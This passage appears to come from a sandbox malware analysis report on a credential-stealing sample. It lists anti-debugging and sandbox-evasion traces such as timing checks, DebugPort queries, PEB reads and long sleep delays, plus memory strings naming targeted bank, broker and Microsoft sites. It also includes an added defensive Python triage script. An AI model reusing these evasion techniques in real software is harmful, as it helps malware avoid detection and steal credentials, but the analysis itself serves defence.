                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Code function: 0_2_00493B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, | 0_2_00493B12
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Code function: 0_2_0049BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, | 0_2_0049BCBC
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Code function: 6_2_0061C400 FindFirstFileW,FindNextFileW,FindClose, | 6_2_0061C400
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Code function: 0_2_004349A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, | 0_2_004349A0
                Source: -0-5538O2.6.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: -0-5538O2.6.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: -0-5538O2.6.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: -0-5538O2.6.dr | Binary or memory string: discord.comVMware20,11696487552f
                Source: -0-5538O2.6.dr | Binary or memory string: bankofamerica.comVMware20,11696487552x
                Source: -0-5538O2.6.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: -0-5538O2.6.dr | Binary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3361688782.0000000000733000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'
                Source: -0-5538O2.6.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: -0-5538O2.6.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: -0-5538O2.6.dr | Binary or memory string: global block list test formVMware20,11696487552
                Source: -0-5538O2.6.dr | Binary or memory string: tasks.office.comVMware20,11696487552o
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.0000000007A08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .comVMware20,11696487552t
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.0000000007A08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware20,11696487552t
                Source: -0-5538O2.6.dr | Binary or memory string: AMC password management pageVMware20,11696487552
                Source: -0-5538O2.6.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: -0-5538O2.6.dr | Binary or memory string: dev.azure.comVMware20,11696487552j
                Source: firefox.exe, 00000008.00000002.2924069117.000001E91FADD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAA
                Source: -0-5538O2.6.dr | Binary or memory string: interactivebrokers.comVMware20,11696487552
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.0000000007A08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,116964875owk
                Source: -0-5538O2.6.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: -0-5538O2.6.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.0000000007A08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ve Brokers - HKVMware20,11696487552]
                Source: -0-5538O2.6.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: -0-5538O2.6.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: -0-5538O2.6.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: -0-5538O2.6.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: -0-5538O2.6.dr | Binary or memory string: outlook.office365.comVMware20,11696487552t
                Source: -0-5538O2.6.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.0000000007A08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CDYNVMware20,11696487552p
                Source: -0-5538O2.6.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: -0-5538O2.6.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.0000000007A08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,1}vU
                Source: -0-5538O2.6.dr | Binary or memory string: outlook.office.comVMware20,11696487552s
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.0000000007A08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: active Brokers - EU WestVMware20,11696487552n
                Source: -0-5538O2.6.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: -0-5538O2.6.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: -0-5538O2.6.dr | Binary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.0000000007A08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.0000000007A08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: hdfcbank.comVMware20,11696487552
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.0000000007A08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,1
                Source: -0-5538O2.6.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: XNNdkVYUhBbatb.exe, 00000005.00000002.3364873661.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllB
                Source: -0-5538O2.6.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | API call chain: ExitProcess graph end node | graph_0-100840
                Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0377096E rdtsc | 2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004175C3 LdrLoadDll, | 2_2_004175C3
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Code function: 0_2_004A3F09 BlockInput, | 0_2_004A3F09
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Code function: 0_2_00433B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, | 0_2_00433B3A
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Code function: 0_2_00465A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, | 0_2_00465A7C
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Code function: 0_2_00434B37 LoadLibraryA,GetProcAddress, | 0_2_00434B37
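The evasion evidence in this section is spread over hundreds of fused rows: the rdtsc timing check, the DebugPort queries, the Sleep stalling by RMActivate_ssp_isv.exe TID 3820 (2277 and 7697 calls), the "VMware" string hits and, from here on, the long run of fs:[00000030h] reads (the PEB pointer, which is where BeingDebugged and NtGlobalFlag live). The script below is an added triage helper for this page; it is not Joe Security code and not part of the report. It splits each fused row into process, thread id, event label and detail, then totals the sleep budget per thread, counts PEB reads per process and lists the hostnames that sit in front of the "VMware20,11696487552" marker. Two caveats an analyst should carry into reading these rows: the report's sleep-time figures are labelled "s" but 2277 calls summing to 4554000 works out to 2000 per call, so the script treats the value as milliseconds (an assumption); and the "VMware" hits come from the dropped file -0-5538O2.6.dr and memory of the injected process, paired with bank, broker and Microsoft hostnames, so they read as entries of a harvested credential store rather than hypervisor-fingerprinting code (an interpretation of the rows, not something the report states). The sample rows are copied from the report and constructed into a list for offline use.

```python
"""Triage helper for the 'Malware Analysis System Evasion' rows of a Joe Sandbox report.

Added example for this page; not Joe Security code and not part of the report.
It parses fused "Source: <process><event>: <detail>" rows and summarises:
  * sleep-based stalling per thread (calls and total delay),
  * PEB reads (mov reg, fs:[30h]) per process, the usual BeingDebugged/NtGlobalFlag check,
  * hostnames in front of the 'VMware20,...' marker in the dropped stealer output.
Assumption: 'Thread sleep time' values are milliseconds despite the report's 's' suffix
(2277 calls summing to 4554000 works out to 2000 per call).
"""
import re
from collections import Counter, defaultdict

# Constructed sample: rows copied from the report; some are truncated by the report itself.
SAMPLE_ROWS = [
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E rdtsc 2_2_0377096E",
    r"Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe TID: 3820Thread sleep count: 2277 > 30Jump to behavior",
    r"Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe TID: 3820Thread sleep time: -4554000s >= -30000sJump to behavior",
    r"Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe TID: 3820Thread sleep count: 7697 > 30Jump to behavior",
    r"Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe TID: 3820Thread sleep time: -15394000s >= -30000sJump to behavior",
    r"Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe TID: 948Thread sleep time: -35000s >= -30000sJump to behavior",
    r"Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior",
    r"Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_01F934F0 mov eax, dword ptr fs:[00000030h]0_2_01F934F0",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov ecx, dword ptr fs:[00000030h]2_2_037B035C",
    r"Source: -0-5538O2.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE",
    r"Source: -0-5538O2.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552",
    r"Source: -0-5538O2.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u",
    r"Source: RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.0000000007A08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .comVMware20,11696487552t",
]

EVENTS = (
    "Code function", "Thread sleep count", "Thread sleep time", "Process queried",
    "Process information queried", "Binary or memory string", "Section loaded",
    "API/Special instruction interceptor", "Window / User API", "API coverage",
)
# The source cell runs straight into the event label, so split on the first known label.
ROW_RE = re.compile(
    r"^Source: (?P<source>.*?)(?P<event>" + "|".join(re.escape(e) for e in EVENTS) + r"): "
    r"(?P<detail>.*?)(?:Jump to behavior)?$"
)
TID_RE = re.compile(r"^(?P<proc>.*?)(?: TID: (?P<tid>\d+))?$")
SLEEP_COUNT_RE = re.compile(r"^(\d+) > \d+$")
SLEEP_TIME_RE = re.compile(r"^-(\d+)s >= -\d+s$")
PEB_RE = re.compile(r"fs:\[00000030h\]")           # TEB+0x30 holds the PEB pointer on 32-bit Windows
HOST_RE = re.compile(r"^(\S+?)VMware20")           # text directly in front of the marker, no spaces
HOST_SHAPE_RE = re.compile(r"[a-z0-9-]+(?:\.[a-z0-9-]+)+(?:/\S*)?")  # host[/path]


def parse_row(row):
    """Split one fused report row into process, thread id, event label and detail."""
    m = ROW_RE.match(row)
    if not m:
        return None
    t = TID_RE.match(m["source"])
    # Keep only the image name; memory-dump sources look like "proc.exe, 00000006....sdmp".
    proc = t["proc"].rsplit("\\", 1)[-1].split(", ")[0]
    return {"proc": proc, "tid": t["tid"], "event": m["event"], "detail": m["detail"]}


def parsed(rows):
    return [r for r in map(parse_row, rows) if r]


def sleep_budget(rows):
    """Per (process, tid): Sleep calls and total delay in ms (assumed unit, see docstring)."""
    budget = defaultdict(lambda: {"calls": 0, "ms": 0})
    for r in parsed(rows):
        key = (r["proc"], r["tid"])
        if r["event"] == "Thread sleep count":
            m = SLEEP_COUNT_RE.match(r["detail"])
            if m:
                budget[key]["calls"] += int(m.group(1))
        elif r["event"] == "Thread sleep time":
            m = SLEEP_TIME_RE.match(r["detail"])
            if m:
                budget[key]["ms"] += int(m.group(1))
    return dict(budget)


def peb_reads(rows):
    """fs:[30h] reads per process; many of them is the footprint of inlined anti-debug checks."""
    counts = Counter()
    for r in parsed(rows):
        if r["event"] == "Code function" and PEB_RE.search(r["detail"]):
            counts[r["proc"]] += 1
    return counts


def harvested_hosts(rows):
    """Hostnames (with optional path) that precede the 'VMware20,...' marker in memory strings."""
    hosts = set()
    for r in parsed(rows):
        if r["event"] != "Binary or memory string":
            continue
        m = HOST_RE.match(r["detail"])
        if m and HOST_SHAPE_RE.fullmatch(m.group(1)):
            hosts.add(m.group(1))
    return hosts


if __name__ == "__main__":
    for (proc, tid), b in sleep_budget(SAMPLE_ROWS).items():
        print(f"{proc} tid={tid}: {b['calls']} Sleep calls, {b['ms'] / 1000:.0f} s total")
    for proc, n in peb_reads(SAMPLE_ROWS).items():
        print(f"{proc}: {n} PEB read(s)")
    print("hosts in stealer output:", sorted(harvested_hosts(SAMPLE_ROWS)))
```

Run it on the full row list of a report (one row per line, as they appear on this page) to get the same three summaries for every process. The per-thread sleep total is the number to compare against a sandbox's run time: with RMActivate_ssp_isv.exe TID 3820 sleeping for roughly 19,948 s in total, the injected stage would not reach its post-delay code inside a default analysis window unless the sandbox shortens sleeps, which is exactly the behaviour the "threadDelayed" rows record.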
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Code function: 0_2_01F934F0 mov eax, dword ptr fs:[00000030h] | 0_2_01F934F0
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Code function: 0_2_01F93490 mov eax, dword ptr fs:[00000030h] | 0_2_01F93490
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Code function: 0_2_01F91E70 mov eax, dword ptr fs:[00000030h] | 0_2_01F91E70
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037D437C mov eax, dword ptr fs:[00000030h] | 2_2_037D437C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h] | 2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h] | 2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h] | 2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B035C mov ecx, dword ptr fs:[00000030h] | 2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h] | 2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h] | 2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FA352 mov eax, dword ptr fs:[00000030h] | 2_2_037FA352
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037D8350 mov ecx, dword ptr fs:[00000030h] | 2_2_037D8350
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] | 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] | 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] | 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] | 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] | 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] | 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] | 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] | 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] | 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] | 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] | 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] | 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] | 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] | 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] | 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0372C310 mov ecx, dword ptr fs:[00000030h] | 2_2_0372C310
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03750310 mov ecx, dword ptr fs:[00000030h] | 2_2_03750310
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h] | 2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h] | 2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h] | 2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h] | 2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h] | 2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h] | 2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037663FF mov eax, dword ptr fs:[00000030h] | 2_2_037663FF
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h] | 2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h] | 2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h] | 2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h] | 2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h] | 2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h] | 2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h] | 2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h] | 2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03808324 mov eax, dword ptr fs:[00000030h] | 2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03808324 mov ecx, dword ptr fs:[00000030h] | 2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03808324 mov eax, dword ptr fs:[00000030h] | 2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03808324 mov eax, dword ptr fs:[00000030h] | 2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov ecx, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]2_2_037D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]2_2_037D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC3CD mov eax, dword ptr fs:[00000030h]2_2_037EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B63C0 mov eax, dword ptr fs:[00000030h]2_2_037B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380634F mov eax, dword ptr fs:[00000030h]2_2_0380634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]2_2_0375438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]2_2_0375438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372826B mov eax, dword ptr fs:[00000030h]2_2_0372826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A250 mov eax, dword ptr fs:[00000030h]2_2_0372A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736259 mov eax, dword ptr fs:[00000030h]2_2_03736259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA250 mov eax, dword ptr fs:[00000030h]2_2_037EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA250 mov eax, dword ptr fs:[00000030h]2_2_037EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B8243 mov eax, dword ptr fs:[00000030h]2_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B8243 mov ecx, dword ptr fs:[00000030h]2_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372823B mov eax, dword ptr fs:[00000030h]2_2_0372823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038062D6 mov eax, dword ptr fs:[00000030h]2_2_038062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov ecx, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380625D mov eax, dword ptr fs:[00000030h]2_2_0380625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]2_2_0376E284
